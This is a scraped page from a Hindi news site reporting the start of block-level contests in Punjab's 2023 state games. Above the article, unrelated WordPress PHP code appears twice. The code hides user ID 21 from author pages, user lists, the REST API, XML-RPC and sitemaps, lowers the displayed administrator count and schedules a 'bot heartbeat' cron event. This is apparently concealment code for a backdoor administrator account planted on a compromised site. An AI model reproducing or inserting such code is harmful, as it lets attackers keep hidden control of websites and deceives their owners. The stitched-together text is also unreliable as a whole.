add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
खेडां वतन पंजाब दियां-2023 के ब्लॉक स्तरीय मुकाबलों की हुई शुरुआत - Press Ki Taquat
No Result
View All Result
आठ खेलों में आठ उम्र वर्गों के ब्लॉक स्तरीय मुकाबले 31 अगस्त से 9 सितम्बर तक चलेंगे
चंडीगढ़, 31 अगस्त: (प्रेस की ताकत ब्यूरो)
पंजाब के मुख्यमंत्री स. भगवंत सिंह मान द्वारा बठिंडा में उद्घाटन समारोह के दौरान ‘खेडां वतन पंजाब दियां- 2023’ ( सीजन-2) के शानदार आग़ाज़ के बाद आज ब्लॉक स्तरीय मुकाबलों की शुरुआत हो गई। आज राज्य भर के 157 ब्लॉकों में आठ खेलों में मुकाबले शुरू हो गए और डेढ़ लाख से अधिक खिलाड़ी हिस्सा ले रहे हैं।
खेल मंत्री गुरमीत सिंह मीत हेयर ने समूह जि़ला खेल अफसरों को हिदायत की है कि जो खिलाड़ी ऑनलाइन रजिस्ट्रेशन नहीं करवा सके परन्तु वह ग्राउंड में पहुँचते हैं तो उनको भी हिस्सा दिलाया जाये। कई खिलाडिय़ों द्वारा यह माँग की जा रही थी कि वह किसी कारण रजिस्ट्रेशन नहीं करवा सके, इसलिए खेल मंत्री द्वारा उनके हितों को ध्यान में रखते हुए यह फ़ैसला किया गया है।
खेल मंत्री गुरमीत सिंह मीत हेयर ने जानकारी साझा करते हुए बताया कि इस बार कुल 35 खेलों में आठ उम्र वर्गों के मुकाबले करवाए जा रहे हैं। इनमें से आठ खेलों के मुकाबले ब्लॉक स्तर से शुरू हो गए हैं। एथलैटिक्स, फ़ुटबॉल, वॉलीबॉल (स्मैशिंग और शूटिंग), कबड्डी (नेशनल स्टाइल और सर्कल स्टाइल), खो-खो और रस्साकशी खेल में लडक़ों और लड़कियों के आठ उम्र वर्गों अंडर 14, अंडर 17, अंडर 21, 21 से 30 साल, 31 से 40 साल, 41 से 55 साल, 55 से 65 साल और 65 साल से अधिक के मुकाबले करवाए जा रहे हैं। उक्त खेलों में ब्लॉक के विजेता आगे जि़ला स्तरीय टूर्नामैंट्स में हिस्सा लेंगे।
मीत हेयर ने बताया कि जि़ला स्तरीय मुकाबलों में उक्त आठ खेल के विजेताओं के अलावा बाकी अन्य नई खेलों के सीधे मुकाबले होंगे और फिर अक्तूबर महीने में राज्य स्तरीय मुकाबले होंगे। उन्होंने कहा कि पहले सीजन की सफलता के बाद इस बार खिलाडिय़ों में और अधिक उत्साह पाया जा रहा है। राज्य स्तरीय विजेताओं को 7 करोड़ रुपए की इनामी राशि दी जायेगी। उन्होंने कहा कि खेल विभाग द्वारा खिलाडिय़ों के मुकाबलों के लिए सुचारू प्रबंध किये गए हैं।
Post Views: 181
No Result
View All Result